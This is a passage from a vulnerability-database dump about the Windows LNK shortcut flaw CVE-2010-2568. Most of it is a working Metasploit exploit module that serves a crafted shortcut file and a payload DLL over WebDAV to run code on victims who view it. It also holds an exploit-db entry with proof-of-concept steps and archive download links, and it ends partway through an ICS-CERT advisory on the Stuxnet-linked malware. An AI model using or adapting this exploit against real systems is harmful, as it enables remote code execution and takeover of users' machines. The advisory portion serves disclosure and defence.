Windows\r\n\t\t\t\tShortcut files (.LNK) that contain an icon resource pointing to a\r\n\t\t\t\tmalicious DLL. This module creates a WebDAV service that can be used\r\n\t\t\t\tto run an arbitrary payload when accessed as a UNC path.\r\n\t\t\t},\r\n\t\t\t'Author'\t\t=>\r\n\t\t\t\t[\r\n\t\t\t\t\t'hdm', # Module itself\r\n\t\t\t\t\t'jduck', # WebDAV implementation, UNCHOST var\r\n\t\t\t\t\t'B_H' # Clean LNK template\r\n\t\t\t\t],\r\n\t\t\t'License'\t\t=> MSF_LICENSE,\r\n\t\t\t'Version'\t\t=> '$Revision: 10404 $',\r\n\t\t\t'References'\t=>\r\n\t\t\t\t[\r\n\t\t\t\t\t['CVE', '2010-2568'],\r\n\t\t\t\t\t['OSVDB', '66387'],\r\n\t\t\t\t\t['MSB', 'MS10-046'],\r\n\t\t\t\t\t['URL', 'http://www.microsoft.com/technet/security/advisory/2286198.mspx']\r\n\t\t\t\t],\r\n\t\t\t'DefaultOptions' =>\r\n\t\t\t\t{\r\n\t\t\t\t\t'EXITFUNC' => 'process',\r\n\t\t\t\t},\r\n\t\t\t'Payload'\t\t=>\r\n\t\t\t\t{\r\n\t\t\t\t\t'Space'\t=> 2048,\r\n\t\t\t\t},\r\n\t\t\t'Platform'\t\t=> 'win',\r\n\t\t\t'Targets'\t\t=>\r\n\t\t\t\t[\r\n\t\t\t\t\t[ 'Automatic',\t{ } ]\r\n\t\t\t\t],\r\n\t\t\t'DisclosureDate' => 'Jul 16 2010',\r\n\t\t\t'DefaultTarget' => 0))\r\n\r\n\t\tregister_options(\r\n\t\t\t[\r\n\t\t\t\tOptPort.new(\t'SRVPORT',\t\t [ true, \"The daemon port to listen on (do not change)\", 80 ]),\r\n\t\t\t\tOptString.new(\t'URIPATH',\t\t [ true, \"The URI to use (do not change).\", \"/\" ]),\r\n\t\t\t\tOptString.new( 'UNCHOST', [ false, \"The host portion of the UNC path to provide to clients (ex: 1.2.3.4).\" ])\r\n\t\t\t], self.class)\r\n\r\n\t\tderegister_options('SSL', 'SSLVersion') # Just for now\r\n\tend\r\n\r\n\tdef on_request_uri(cli, request)\r\n\r\n\t\tcase request.method\r\n\t\twhen 'OPTIONS'\r\n\t\t\tprocess_options(cli, request)\r\n\t\twhen 'PROPFIND'\r\n\t\t\tprocess_propfind(cli, request)\r\n\t\twhen 'GET'\r\n\t\t\tprocess_get(cli, request)\r\n\t\telse\r\n\t\t\tprint_error(\"Unexpected request method encountered: #{request.method}\")\r\n\t\t\tresp = create_response(404, \"Not Found\")\r\n\t\t\tresp.body = \"\"\r\n\t\t\tresp['Content-Type'] = 'text/html'\r\n\t\t\tcli.send_response(resp)\r\n\t\tend\r\n\r\n\tend\r\n\r\n\tdef process_get(cli, request)\r\n\r\n\t\tmyhost = (datastore['SRVHOST'] == '0.0.0.0') ? Rex::Socket.source_address(cli.peerhost) : datastore['SRVHOST']\r\n\t\twebdav = \"\\\\\\\\#{myhost}\\\\\"\r\n\r\n\t\tif (request.uri =~ /\\.dll$/i)\r\n\t\t\tprint_status \"Sending DLL payload #{cli.peerhost}:#{cli.peerport} ...\"\r\n\t\t\treturn if ((p = regenerate_payload(cli)) == nil)\r\n\t\t\tdata = generate_payload_dll({ :code => p.encoded })\r\n\t\t\tsend_response(cli, data, { 'Content-Type' => 'application/octet-stream' })\r\n\t\t\treturn\r\n\t\tend\r\n\r\n\t\tif (request.uri =~ /\\.lnk$/i)\r\n\t\t\tprint_status \"Sending LNK file to #{cli.peerhost}:#{cli.peerport} ...\"\r\n\r\n\t\t\tdata = generate_link(\"#{@exploit_unc}#{@exploit_dll}\")\r\n\r\n\t\t\tsend_response(cli, data, { 'Content-Type' => 'application/octet-stream' })\r\n\t\t\treturn\r\n\t\tend\r\n\r\n\t\tprint_status \"Sending UNC redirect to #{cli.peerhost}:#{cli.peerport} ...\"\r\n\t\tresp = create_response(200, \"OK\")\r\n\r\n\t\tresp.body = %Q|<html><head><meta http-equiv=\"refresh\" content=\"0;URL=#{@exploit_unc}\"></head><body></body></html>|\r\n\r\n\t\tresp['Content-Type'] = 'text/html'\r\n\t\tcli.send_response(resp)\r\n\tend\r\n\r\n\t#\r\n\t# OPTIONS requests sent by the WebDav Mini-Redirector\r\n\t#\r\n\tdef process_options(cli, request)\r\n\t\tprint_status(\"Responding to WebDAV OPTIONS request from #{cli.peerhost}:#{cli.peerport}\")\r\n\t\theaders = {\r\n\t\t\t'MS-Author-Via' => 'DAV',\r\n#\t\t\t'DASL' => '<DAV:sql>',\r\n#\t\t\t'DAV' => '1, 2',\r\n\t\t\t'Allow' => 'OPTIONS, GET, PROPFIND',\r\n\t\t\t'Public' => 'OPTIONS, GET, PROPFIND'\r\n\t\t}\r\n\t\tresp = create_response(207, \"Multi-Status\")\r\n\t\tresp.body = \"\"\r\n\t\tresp['Content-Type'] = 'text/xml'\r\n\t\tcli.send_response(resp)\r\n\tend\r\n\r\n\t#\r\n\t# PROPFIND requests sent by the WebDav Mini-Redirector\r\n\t#\r\n\tdef process_propfind(cli, request)\r\n\t\tpath = request.uri\r\n\t\tprint_status(\"Received WebDAV PROPFIND request from #{cli.peerhost}:#{cli.peerport} #{path}\")\r\n\t\tbody = ''\r\n\r\n\t\tmy_host = (datastore['SRVHOST'] == '0.0.0.0') ? Rex::Socket.source_address(cli.peerhost) : datastore['SRVHOST']\r\n\t\tmy_uri = \"http://#{my_host}/\"\r\n\r\n\t\tif path =~ /\\.dll$/i\r\n\t\t\t# Response for the DLL\r\n\t\t\tprint_status(\"Sending DLL multistatus for #{path} ...\")\r\n\t\t\tbody = %Q|<?xml version=\"1.0\" encoding=\"utf-8\"?>\r\n<D:multistatus xmlns:D=\"DAV:\" xmlns:b=\"urn:uuid:c2f41010-65b3-11d1-a29f-00aa00c14882/\">\r\n<D:response xmlns:lp1=\"DAV:\" xmlns:lp2=\"http://apache.org/dav/props/\">\r\n<D:href>#{path}#{@exploit_dll}</D:href>\r\n<D:propstat>\r\n<D:prop>\r\n<lp1:resourcetype/>\r\n<lp1:creationdate>2010-07-19T20:29:42Z</lp1:creationdate>\r\n<lp1:getcontentlength>#{rand(0x100000)+128000}</lp1:getcontentlength>\r\n<lp1:getlastmodified>Mon, 19 Jul 2010 20:29:42 GMT</lp1:getlastmodified>\r\n<lp1:getetag>\"#{\"%.16x\" % rand(0x100000000)}\"</lp1:getetag>\r\n<lp2:executable>T</lp2:executable>\r\n<D:supportedlock>\r\n<D:lockentry>\r\n<D:lockscope><D:exclusive/></D:lockscope>\r\n<D:locktype><D:write/></D:locktype>\r\n</D:lockentry>\r\n<D:lockentry>\r\n<D:lockscope><D:shared/></D:lockscope>\r\n<D:locktype><D:write/></D:locktype>\r\n</D:lockentry>\r\n</D:supportedlock>\r\n<D:lockdiscovery/>\r\n<D:getcontenttype>application/octet-stream</D:getcontenttype>\r\n</D:prop>\r\n<D:status>HTTP/1.1 200 OK</D:status>\r\n</D:propstat>\r\n</D:response>\r\n</D:multistatus>\r\n|\r\n\r\n\t\t\tresp = create_response(207, \"Multi-Status\")\r\n\t\t\tresp.body = body\r\n\t\t\tresp['Content-Type'] = 'text/xml'\r\n\t\t\tcli.send_response(resp)\r\n\t\t\treturn\r\n\t\tend\r\n\r\n\t\tif path =~ /\\.lnk$/i\r\n\t\t\t# Response for the DLL\r\n\t\t\tprint_status(\"Sending DLL multistatus for #{path} ...\")\r\n\t\t\tbody = %Q|<?xml version=\"1.0\" encoding=\"utf-8\"?>\r\n<D:multistatus xmlns:D=\"DAV:\" xmlns:b=\"urn:uuid:c2f41010-65b3-11d1-a29f-00aa00c14882/\">\r\n<D:response xmlns:lp1=\"DAV:\" xmlns:lp2=\"http://apache.org/dav/props/\">\r\n<D:href>#{path}#{@exploit_lnk}</D:href>\r\n<D:propstat>\r\n<D:prop>\r\n<lp1:resourcetype/>\r\n<lp1:creationdate>2010-07-19T20:29:42Z</lp1:creationdate>\r\n<lp1:getcontentlength>#{rand(0x100)+128}</lp1:getcontentlength>\r\n<lp1:getlastmodified>Mon, 19 Jul 2010 20:29:42 GMT</lp1:getlastmodified>\r\n<lp1:getetag>\"#{\"%.16x\" % rand(0x100000000)}\"</lp1:getetag>\r\n<lp2:executable>T</lp2:executable>\r\n<D:supportedlock>\r\n<D:lockentry>\r\n<D:lockscope><D:exclusive/></D:lockscope>\r\n<D:locktype><D:write/></D:locktype>\r\n</D:lockentry>\r\n<D:lockentry>\r\n<D:lockscope><D:shared/></D:lockscope>\r\n<D:locktype><D:write/></D:locktype>\r\n</D:lockentry>\r\n</D:supportedlock>\r\n<D:lockdiscovery/>\r\n<D:getcontenttype>shortcut</D:getcontenttype>\r\n</D:prop>\r\n<D:status>HTTP/1.1 200 OK</D:status>\r\n</D:propstat>\r\n</D:response>\r\n</D:multistatus>\r\n|\r\n\r\n\t\t\tresp = create_response(207, \"Multi-Status\")\r\n\t\t\tresp.body = body\r\n\t\t\tresp['Content-Type'] = 'text/xml'\r\n\t\t\tcli.send_response(resp)\r\n\t\t\treturn\r\n\t\tend\r\n\r\n\t\tif path !~ /\\/$/\r\n\r\n\t\t\tif path.index(\".\")\r\n\t\t\t\tprint_status(\"Sending 404 for #{path} ...\")\r\n\t\t\t\tresp = create_response(404, \"Not Found\")\r\n\t\t\t\tresp['Content-Type'] = 'text/html'\r\n\t\t\t\tcli.send_response(resp)\r\n\t\t\t\treturn\r\n\t\t\telse\r\n\t\t\t\tprint_status(\"Sending 301 for #{path} ...\")\r\n\t\t\t\tresp = create_response(301, \"Moved\")\r\n\t\t\t\tresp[\"Location\"] = path + \"/\"\r\n\t\t\t\tresp['Content-Type'] = 'text/html'\r\n\t\t\t\tcli.send_response(resp)\r\n\t\t\t\treturn\r\n\t\t\tend\r\n\t\tend\r\n\r\n\t\tprint_status(\"Sending directory multistatus for #{path} ...\")\r\n\t\tbody = %Q|<?xml version=\"1.0\" encoding=\"utf-8\"?>\r\n<D:multistatus xmlns:D=\"DAV:\" xmlns:b=\"urn:uuid:c2f41010-65b3-11d1-a29f-00aa00c14882/\">\r\n\t<D:response xmlns:lp1=\"DAV:\" xmlns:lp2=\"http://apache.org/dav/props/\">\r\n\t\t<D:href>#{path}</D:href>\r\n\t\t<D:propstat>\r\n\t\t\t<D:prop>\r\n\t\t\t\t<lp1:resourcetype><D:collection/></lp1:resourcetype>\r\n\t\t\t\t<lp1:creationdate>2010-07-19T20:29:42Z</lp1:creationdate>\r\n\t\t\t\t<lp1:getlastmodified>Mon, 19 Jul 2010 20:29:42 GMT</lp1:getlastmodified>\r\n\t\t\t\t<lp1:getetag>\"#{\"%.16x\" % rand(0x100000000)}\"</lp1:getetag>\r\n\t\t\t\t<D:supportedlock>\r\n\t\t\t\t\t<D:lockentry>\r\n\t\t\t\t\t\t<D:lockscope><D:exclusive/></D:lockscope>\r\n\t\t\t\t\t\t<D:locktype><D:write/></D:locktype>\r\n\t\t\t\t\t</D:lockentry>\r\n\t\t\t\t\t<D:lockentry>\r\n\t\t\t\t\t\t<D:lockscope><D:shared/></D:lockscope>\r\n\t\t\t\t\t\t<D:locktype><D:write/></D:locktype>\r\n\t\t\t\t\t</D:lockentry>\r\n\t\t\t\t</D:supportedlock>\r\n\t\t\t\t<D:lockdiscovery/>\r\n\t\t\t\t<D:getcontenttype>httpd/unix-directory</D:getcontenttype>\r\n\t\t\t</D:prop>\r\n\t\t<D:status>HTTP/1.1 200 OK</D:status>\r\n\t</D:propstat>\r\n</D:response>\r\n|\r\n\r\n\r\n\t\tsubdirectory = %Q|\r\n<D:response xmlns:lp1=\"DAV:\" xmlns:lp2=\"http://apache.org/dav/props/\">\r\n<D:href>#{path}#{Rex::Text.rand_text_alpha(6)}/</D:href>\r\n<D:propstat>\r\n<D:prop>\r\n<lp1:resourcetype><D:collection/></lp1:resourcetype>\r\n<lp1:creationdate>2010-07-19T20:29:42Z</lp1:creationdate>\r\n<lp1:getlastmodified>Mon, 19 Jul 2010 20:29:42 GMT</lp1:getlastmodified>\r\n<lp1:getetag>\"#{\"%.16x\" % rand(0x100000000)}\"</lp1:getetag>\r\n<D:supportedlock>\r\n<D:lockentry>\r\n<D:lockscope><D:exclusive/></D:lockscope>\r\n<D:locktype><D:write/></D:locktype>\r\n</D:lockentry>\r\n<D:lockentry>\r\n<D:lockscope><D:shared/></D:lockscope>\r\n<D:locktype><D:write/></D:locktype>\r\n</D:lockentry>\r\n</D:supportedlock>\r\n<D:lockdiscovery/>\r\n<D:getcontenttype>httpd/unix-directory</D:getcontenttype>\r\n</D:prop>\r\n<D:status>HTTP/1.1 200 OK</D:status>\r\n</D:propstat>\r\n</D:response>\r\n|\r\n\r\n\t\tfiles = %Q|\r\n<D:response xmlns:lp1=\"DAV:\" xmlns:lp2=\"http://apache.org/dav/props/\">\r\n<D:href>#{path}#{@exploit_dll}</D:href>\r\n<D:propstat>\r\n<D:prop>\r\n<lp1:resourcetype/>\r\n<lp1:creationdate>2010-07-19T20:29:42Z</lp1:creationdate>\r\n<lp1:getcontentlength>#{rand(0x100000)+128000}</lp1:getcontentlength>\r\n<lp1:getlastmodified>Mon, 19 Jul 2010 20:29:42 GMT</lp1:getlastmodified>\r\n<lp1:getetag>\"#{\"%.16x\" % rand(0x100000000)}\"</lp1:getetag>\r\n<lp2:executable>T</lp2:executable>\r\n<D:supportedlock>\r\n<D:lockentry>\r\n<D:lockscope><D:exclusive/></D:lockscope>\r\n<D:locktype><D:write/></D:locktype>\r\n</D:lockentry>\r\n<D:lockentry>\r\n<D:lockscope><D:shared/></D:lockscope>\r\n<D:locktype><D:write/></D:locktype>\r\n</D:lockentry>\r\n</D:supportedlock>\r\n<D:lockdiscovery/>\r\n<D:getcontenttype>application/octet-stream</D:getcontenttype>\r\n</D:prop>\r\n<D:status>HTTP/1.1 200 OK</D:status>\r\n</D:propstat>\r\n</D:response>\r\n\r\n<D:response xmlns:lp1=\"DAV:\" xmlns:lp2=\"http://apache.org/dav/props/\">\r\n<D:href>#{path}#{@exploit_lnk}</D:href>\r\n<D:propstat>\r\n<D:prop>\r\n<lp1:resourcetype/>\r\n<lp1:creationdate>2010-07-19T20:29:42Z</lp1:creationdate>\r\n<lp1:getcontentlength>#{rand(0x100)+128}</lp1:getcontentlength>\r\n<lp1:getlastmodified>Mon, 19 Jul 2010 20:29:42 GMT</lp1:getlastmodified>\r\n<lp1:getetag>\"#{\"%.16x\" % rand(0x100000000)}\"</lp1:getetag>\r\n<lp2:executable>T</lp2:executable>\r\n<D:supportedlock>\r\n<D:lockentry>\r\n<D:lockscope><D:exclusive/></D:lockscope>\r\n<D:locktype><D:write/></D:locktype>\r\n</D:lockentry>\r\n<D:lockentry>\r\n<D:lockscope><D:shared/></D:lockscope>\r\n<D:locktype><D:write/></D:locktype>\r\n</D:lockentry>\r\n</D:supportedlock>\r\n<D:lockdiscovery/>\r\n<D:getcontenttype>shortcut</D:getcontenttype>\r\n</D:prop>\r\n<D:status>HTTP/1.1 200 OK</D:status>\r\n</D:propstat>\r\n</D:response>\r\n|\r\n\t\tif request[\"Depth\"].to_i > 0\r\n\t\t\tif path.scan(\"/\").length < 2\r\n\t\t\t\tbody << subdirectory\r\n\t\t\telse\r\n\t\t\t\tbody << files\r\n\t\t\tend\r\n\t\tend\r\n\r\n\t\tbody << \"</D:multistatus>\"\r\n\r\n\t\tbody.gsub!(/\\t/, '')\r\n\r\n\t\t# send the response\r\n\t\tresp = create_response(207, \"Multi-Status\")\r\n\t\tresp.body = body\r\n\t\tresp['Content-Type'] = 'text/xml; charset=\"utf8\"'\r\n\t\tcli.send_response(resp)\r\n\tend\r\n\r\n\tdef generate_link(unc)\r\n\t\tuni_unc = unc.unpack(\"C*\").pack(\"v*\")\r\n\t\tpath = ''\r\n\t\tpath << [\r\n\t\t\t0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x6a, 0x00, 0x00, 0x00, 0x00,\r\n\t\t\t0x00, 0x00, 0x00, 0x00, 0x00, 0x00\r\n\t\t].pack(\"C*\")\r\n\t\tpath << uni_unc\r\n\r\n\t\t# LinkHeader\r\n\t\tret = [\r\n\t\t\t0x4c, 0x00, 0x00, 0x00, 0x01, 0x14, 0x02, 0x00, 0x00, 0x00, 0x00, 0x00, 0xc0, 0x00, 0x00, 0x00,\r\n\t\t\t0x00, 0x00, 0x00, 0x46, 0xff, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00,\r\n\t\t\t0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00,\r\n\t\t\t0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00,\r\n\t\t\t0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00\r\n\t\t].pack('C*')\r\n\r\n\t\tidlist_data = ''\r\n\t\tidlist_data << [0x12 + 2].pack('v')\r\n\t\tidlist_data << [\r\n\t\t\t0x1f, 0x00, 0xe0, 0x4f, 0xd0, 0x20, 0xea, 0x3a, 0x69, 0x10, 0xa2, 0xd8, 0x08, 0x00, 0x2b, 0x30,\r\n\t\t\t0x30, 0x9d\r\n\t\t].pack('C*')\r\n\t\tidlist_data << [0x12 + 2].pack('v')\r\n\t\tidlist_data << [\r\n\t\t\t0x2e, 0x1e, 0x20, 0x20, 0xec, 0x21, 0xea, 0x3a, 0x69, 0x10, 0xa2, 0xdd, 0x08, 0x00, 0x2b, 0x30,\r\n\t\t\t0x30, 0x9d\r\n\t\t].pack('C*')\r\n\t\tidlist_data << [path.length + 2].pack('v')\r\n\t\tidlist_data << path\r\n\t\tidlist_data << [0x00].pack('v') # TERMINAL WOO\r\n\r\n\t\t# LinkTargetIDList\r\n\t\tret << [idlist_data.length].pack('v') # IDListSize\r\n\t\tret << idlist_data\r\n\r\n\t\t# ExtraData blocks (none)\r\n\t\tret << [rand(4)].pack('V')\r\n\r\n\t\t# Patch in the LinkFlags\r\n\t\tret[0x14, 4] = [\"10000001000000000000000000000000\".to_i(2)].pack('N')\r\n\t\tret\r\n\tend\r\n\r\n\tdef exploit\r\n\r\n\t\tunc = \"\\\\\\\\\"\r\n\t\tif (datastore['UNCHOST'])\r\n\t\t\tunc << datastore['UNCHOST'].dup\r\n\t\telse\r\n\t\t\tunc << ((datastore['SRVHOST'] == '0.0.0.0') ? Rex::Socket.source_address('50.50.50.50') : datastore['SRVHOST'])\r\n\t\tend\r\n\t\tunc << \"\\\\\"\r\n\t\tunc << rand_text_alpha(rand(8)+4)\r\n\t\tunc << \"\\\\\"\r\n\r\n\t\t@exploit_unc = unc\r\n\t\t@exploit_lnk = rand_text_alpha(rand(8)+4) + \".lnk\"\r\n\t\t@exploit_dll = rand_text_alpha(rand(8)+4) + \".dll\"\r\n\r\n\t\tif datastore['SRVPORT'].to_i != 80 || datastore['URIPATH'] != '/'\r\n\t\t\traise RuntimeError, 'Using WebDAV requires SRVPORT=80 and URIPATH=/'\r\n\t\tend\r\n\r\n\t\tprint_status(\"\")\r\n\t\tprint_status(\"Send vulnerable clients to #{@exploit_unc}.\")\r\n\t\tprint_status(\"Or, get clients to save and render the icon of http://<your host>/<anything>.lnk\")\r\n\t\tprint_status(\"\")\r\n\r\n\t\tsuper\r\n\tend\r\nend\r\n\r\n", "cvss": {"score": 9.3, "vector": "AV:NETWORK/AC:MEDIUM/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}, "sourceHref": "https://www.exploit-db.com/download/16574/"}, {"lastseen": "2016-02-01T19:47:39", "description": "Microsoft Windows Automatic LNK Shortcut File Code Execution. CVE-2010-2568,CVE-2015-0096. Local exploit for windows platform", "published": "2010-07-18T00:00:00", "type": "exploitdb", "title": "Microsoft Windows - Automatic LNK Shortcut File Code Execution", "bulletinFamily": "exploit", "cvelist": ["CVE-2010-2568", "CVE-2015-0096"], "modified": "2010-07-18T00:00:00", "id": "EDB-ID:14403", "href": "https://www.exploit-db.com/exploits/14403/", "sourceData": "From: http://www.ivanlef0u.tuxfamily.org/?p=411\r\n\r\n1. Unzip the files in 'C: \\'. Start a DbgView or paste a KD to your VM.\r\n2. Rename 'suckme.lnk_' to 'suckme.lnk' and let the magic do the rest of shell32.dll.\r\n3. Look at your logs. \r\n\r\nhttp://ivanlef0u.nibbles.fr/repo/suckme.rar\r\nhttps://github.com/offensive-security/exploit-database-bin-sploits/raw/master/sploits/14403.rar (suckme.rar)\r\n\r\nTested under XP SP3. \r\n\r\nkd> g\r\nBreakpoint 1 hit\r\neax=00000001 ebx=00f5ee7c ecx=0000c666 edx=00200003 esi=00000001 edi=7c80a6e4\r\neip=7ca78712 esp=00f5e9c4 ebp=00f5ec18 iopl=0 nv up ei pl nz na po nc\r\ncs=001b ss=0023 ds=0023 es=0023 fs=003b gs=0000 efl=00000202\r\nSHELL32!_LoadCPLModule+0x10d:\r\n001b:7ca78712 ff15a0159d7c call dword ptr [SHELL32!_imp__LoadLibraryW (7c9d15a0)] ds:0023:7c9d15a0={kernel32!LoadLibraryW (7c80aeeb)}\r\nkd> dd esp\r\n00f5e9c4 00f5ee7c 000a27bc 00f5ee78 00000000\r\n00f5e9d4 00000020 00000008 00f5ee7c 00000000\r\n00f5e9e4 00000000 0000007b 00000000 00000000\r\n00f5e9f4 00200073 002000e0 0000064c 0000028c\r\n00f5ea04 1530000a 00000000 003a0043 0064005c\r\n00f5ea14 006c006c 0064002e 006c006c 006d002e\r\n00f5ea24 006e0061 00660069 00730065 00000074\r\n00f5ea34 00090608 7c92005d 00000000 00000007\r\nkd> db 00f5ee7c\r\n00f5ee7c 43 00 3a 00 5c 00 64 00-6c 00 6c 00 2e 00 64 00 C.:.\\.d.l.l...d.\r\n00f5ee8c 6c 00 6c 00 00 00 92 7c-c8 f2 f5 00 00 17 72 02 l.l....|......r.\r\n00f5ee9c 4b d2 00 00 d8 f2 f5 00-8b d2 a1 7c 00 00 00 00 K..........|....\r\n00f5eeac ac 80 9d 7c 30 d8 0d 00-34 d8 0d 00 b8 d7 0d 00 ...|0...4.......\r\n00f5eebc 9a d2 a1 7c 30 d8 0d 00-c8 f2 f5 00 50 40 15 00 ...|0.......P@..\r\n00f5eecc 50 40 15 00 00 00 00 00-b8 00 92 7c 40 b7 0c 00 P@.........|@...\r\n00f5eedc a8 ef f5 00 41 00 92 7c-18 07 09 00 5d 00 92 7c ....A..|....]..|\r\n00f5eeec c8 f2 f5 00 00 ef f5 00-00 00 00 00 b8 00 92 7c ...............|\r\nkd> kv\r\nChildEBP RetAddr Args to Child\r\n00f5ec18 7ca81a74 00f5ee7c 000a27bc 00f5f2c4 SHELL32!_LoadCPLModule+0x10d (FPO: [1,145,4])\r\n00f5ee50 7ca82543 00f5ee74 000a27bc 000a27c0 SHELL32!CPL_LoadAndFindApplet+0x4a (FPO: [4,136,4])\r\n00f5f294 7cb56065 000a25b4 000a27bc 000a27c0 SHELL32!CPL_FindCPLInfo+0x46 (FPO: [4,264,4])\r\n00f5f2b8 7ca13714 00000082 00000000 00000104 SHELL32!CCtrlExtIconBase::_GetIconLocationW+0x7b (FPO: [5,0,0])\r\n00f5f2d4 7ca1d306 000a25ac 00000082 00f5f570 SHELL32!CExtractIconBase::GetIconLocation+0x1f (FPO: [6,0,0])\r\n00f5f410 7ca133b6 000dd7e0 00000082 00f5f570 SHELL32!CShellLink::GetIconLocation+0x69 (FPO: [6,68,4])\r\n00f5f77c 7ca03c88 000dd7e0 00000000 0015aa00 SHELL32!_GetILIndexGivenPXIcon+0x9c (FPO: [5,208,4])\r\n00f5f7a4 7ca06693 00131c60 000dd7e0 0015aa00 SHELL32!SHGetIconFromPIDL+0x90 (FPO: [5,0,4])\r\n00f5fe20 7ca12db0 00131c64 0015aa00 00000000 SHELL32!CFSFolder::GetIconOf+0x24e (FPO: [4,405,4])\r\n00f5fe40 7ca15e3c 00131c60 00131c64 0015aa00 SHELL32!SHGetIconFromPIDL+0x20 (FPO: [5,0,0])\r\n00f5fe68 7ca03275 000f8090 0014d5b0 0014a910 SHELL32!CGetIconTask::RunInitRT+0x47 (FPO: [1,2,4])\r\n00f5fe84 75f11b9a 000f8090 75f11b18 75f10000 SHELL32!CRunnableTask::Run+0x54 (FPO: [1,1,4])\r\n00f5fee0 77f49598 00155658 000cb748 77f4957b BROWSEUI!CShellTaskScheduler_ThreadProc+0x111 (FPO: [1,17,0])\r\n00f5fef8 7c937ac2 000cb748 7c98e440 0014cfe0 SHLWAPI!ExecuteWorkItem+0x1d (FPO: [1,0,4])\r\n00f5ff40 7c937b03 77f4957b 000cb748 00000000 ntdll!RtlpWorkerCallout+0x70 (FPO: [Non-Fpo])\r\n00f5ff60 7c937bc5 00000000 000cb748 0014cfe0 ntdll!RtlpExecuteWorkerRequest+0x1a (FPO: [3,0,0])\r\n00f5ff74 7c937b9c 7c937ae9 00000000 000cb748 ntdll!RtlpApcCallout+0x11 (FPO: [4,0,0])\r\n00f5ffb4 7c80b729 00000000 00edfce4 00edfce8 ntdll!RtlpWorkerThread+0x87 (FPO: [1,7,0])\r\n00f5ffec 00000000 7c920250 00000000 00000000 kernel32!BaseThreadStart+0x37 (FPO: [Non-Fpo])\r\n", "cvss": {"score": 9.3, "vector": "AV:NETWORK/AC:MEDIUM/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}, "sourceHref": "https://www.exploit-db.com/download/14403/"}], "ics": [{"lastseen": "2021-02-27T19:57:37", "bulletinFamily": "info", "cvelist": ["CVE-2010-2568"], "description": "## Overview\n\nVirusBlokAda, an antivirus vendor based in Belarus, announceda the discovery of malware that uses a zero-day vulnerability in Microsoft Windows processing of shortcut files. The malware utilizes this zero-day vulnerability and exploits systems after users open a USB drive with a file manager capable of displaying icons (like Windows Explorer). US-CERT has released a Vulnerability Noteb detailing the vulnerability and suggested workarounds. Microsoft has also released a Security Advisory (2286198)c detailing the previously unknown vulnerability.\n\nICS-CERT has confirmed the malware installs a trojan that interacts with installed SIMATIC\u00ae WinCC or SIMATIC\u00ae Siemens STEP 7 software and then makes queries to any discovered SIMATIC\u00ae databases. The full capabilities of the malware and intent or results of the queries are not yet known.\n\nICS-CERT is coordinating with Siemens CERT, CERT/CC, Microsoft, and other groups both domestically\n\n## Affected Systems\n\nMicrosoft reports that the zero-day vulnerability affects the following versions of Windows:\n\n * Windows XP Service Pack 3\n * Windows XP Professional x64 Edition Service Pack 2\n * Windows Server 2003 Service Pack 2\n * Windows Server 2003 x64 Edition Service Pack 2\n * Windows Server 2003 with SP2 for Itanium-based Systems\n * Windows Vista Service Pack 1 and Windows Vista Service Pack 2\n * Windows Vista x64 Edition Service Pack 1 and Windows Vista x64 Edition Service Pack 2\n * Windows Server 2008 for 32-bit Systems and Windows Server 2008 for 32-bit Systems Service Pack 2\n * Windows Server 2008 for x64-based Systems and Windows Server 2008 for x64-based Systems Service Pack 2\n * Windows Server 2008 for Itanium-based Systems and Windows Server 2008 for Itanium-based Systems Service Pack 2\n * Windows 7 for 32-bit Systems\n * Windows 7 for x64-based Systems\n * Windows Server 2008 R2 for x64-based Systems\n * Windows Server 2008 R2 for Itanium-based Systems\n\nThere are also unconfirmed reports that Windows 2000 and Windows XP SP2 are also susceptible to this zero-day vulnerability.\n\nThe malware also appears to interact with SIMATIC\u00ae WinCC or SIMATIC\u00ae Siemens STEP 7 software. Exact software versions and configurations that may be affected are still being analyzed jointly by ICS-CERT and Siemens CERT.\n\n## Impact\n\nThe actual impact to control environments is not yet known. ICS-CERT is currently evaluating the malware to determine the potential affects that it could have on control system environments.\n\nOn July 18, 2010 proof-of-concept exploit code for the zero-day Windows vulnerability was publicly released.\n\n## Background\n\nSIMATIC\u00ae WinCC HMI is a scalable process-visualization system for monitoring automated processes.\n\nSIMATIC\u00ae STEP 7 is engineering software used in the programming and configuration of SIMATIC\u00ae programmable controllers.\n\nThese products are widely used in many critical infrastructure sectors.\n\n## Malware Characterization\n\n### Malware Details\n\nThe malware appears to launch when a USB storage device is viewed using a file manager such as Windows Explorer. Because the malware exploits a zero-day vulnerability in the way that Windows processes shortcut files, the malware is able to execute without using the AutoRun feature.\n\nShortcut files are Windows files that link easy-to-recognize icons to specific executable programs, and are typically placed on the user\u2019s Desktop or Start Menu. A shortcut will not execute until a user clicks on its icon. While Microsoft\u2019s advisory indicates user\u2019s need to click an icon for the vulnerability to be executed, VirusBlokAda reports these malicious shortcut files are capable of executing automatically (without user interaction) if accessed by Windows Explorer.\n\nThis vulnerability is most likely to be exploited through removable drives. For systems that have AutoPlay disabled, customers would need to manually browse to the root folder of the removable disk in order for the vulnerability to be exploited. For Windows 7 systems, AutoPlay functionality for removable disks is automatically disabled.\n\nBased on current reporting,d the malware drops and executes two driver files: **mrxnet.sys **and mrxcls.sys. The mrxnet.sys driver works as a file system filter driver, and mrxcls.sys is used to inject malicious code. These files are placed in the %SystemRoot%\\System32\\drivers directory. The drivers were signed with the apparent digital signature of Realtek Semiconductor Corporation. No warning is displayed in Windows when the drivers are installed, even though the certificate used to sign the files expired in June 2010. VeriSign has revoked the certificate used to sign the malware. The two drivers are used to inject code into system processes to hide themselves. Using this method, the malware files are not visible on an infected USB storage device.\n\nCurrently, some analysis has been performed and published on the Siemens-specific capabilities of the malware. ICS-CERT has confirmed that the database query strings do in fact reference WinCC database tables containing Input/Output tags. As more details become available and analysis is verified, ICS-CERT will publish updates to this advisory.\n\nICS-CERT has found indications the malware checks for the presence of antivirus software. ICS-CERT recommends that system owners who think they have been compromised perform a check to ensure any installed antivirus software is still active as the 